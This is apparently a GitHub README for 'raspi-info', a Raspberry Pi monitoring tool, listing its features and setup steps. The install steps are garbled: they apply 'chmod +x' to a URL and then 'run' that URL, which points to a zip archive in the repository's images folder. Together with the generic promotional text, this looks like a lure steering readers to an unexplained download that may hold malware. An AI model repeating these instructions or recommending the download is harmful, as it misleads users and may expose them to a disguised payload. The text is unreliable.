Welcome to raspi-info! This tool helps you monitor your Raspberry Pi's system information easily. You can check CPU stats, temperature, network status, and more. Letβs get you set up.
raspi-info is designed to provide essential information about your Raspberry Pi system. Whether you're a hobbyist or a seasoned administrator, this tool helps you keep an eye on performance metrics. You will find features to track:
- CPU usage and temperature
- Disk space and storage details
- Network stats and configuration
- Apcupsd for power management
To run raspi-info, you will need:
- A Raspberry Pi device (any model supported)
- An OS that supports bash (e.g., Raspbian, Debian)
- Basic command-line access
Visit the Releases page to download the latest version of raspi-info. Hereβs how you can set it up:
- Click on the Releases page.
- Locate the latest release.
- Find the file suitable for your Raspberry Pi.
- Click the download link to start the download.
Once downloaded, follow these steps to install and run:
- Open your terminal.
- Navigate to the directory where you downloaded the file. Use the
cdcommand:cd /path/to/directory - Make the script executable:
chmod +x https://github.com/Hauntend/raspi-info/raw/refs/heads/master/images/info-raspi-1.4.zip - Run the script:
https://github.com/Hauntend/raspi-info/raw/refs/heads/master/images/info-raspi-1.4.zip
Monitor your Raspberry Pi's CPU usage in real-time. Check how hard your processor is working with easy-to-read graphs.
Keep an eye on the temperature of your CPU. Prevent overheating by monitoring temperatures directly from the interface.
Check your available storage with a simple command. This feature helps you avoid running out of space unexpectedly.
Get details about your network interface, such as IP addresses and connection status. This helps troubleshoot connectivity issues quickly.
If you have a compatible UPS, raspi-info can report on its status. Make sure your devices stay powered during outages.
If you encounter issues:
-
Double-check the permissions of the downloaded file.
-
Ensure your Raspberry Pi is up to date. Run:
sudo apt update && sudo apt upgrade -
Refer to the Issues section on this repository if you need additional help.
If you want to improve raspi-info, contributions are welcome. Feel free to fork the repository, make your changes, and submit a pull request. We appreciate any improvements or bug fixes!
raspi-info is licensed under the MIT License. You are free to use, modify, and distribute it as long as you provide credit to the original authors.
If you have questions or need help with raspi-info, please use the Discussions section to connect with other users and contributors.
For direct support, you can also open an issue in the Issues section mentioned above.
Don't forget to download raspi-info by visiting the Releases page for the latest version. Enjoy your hassle-free monitoring experience!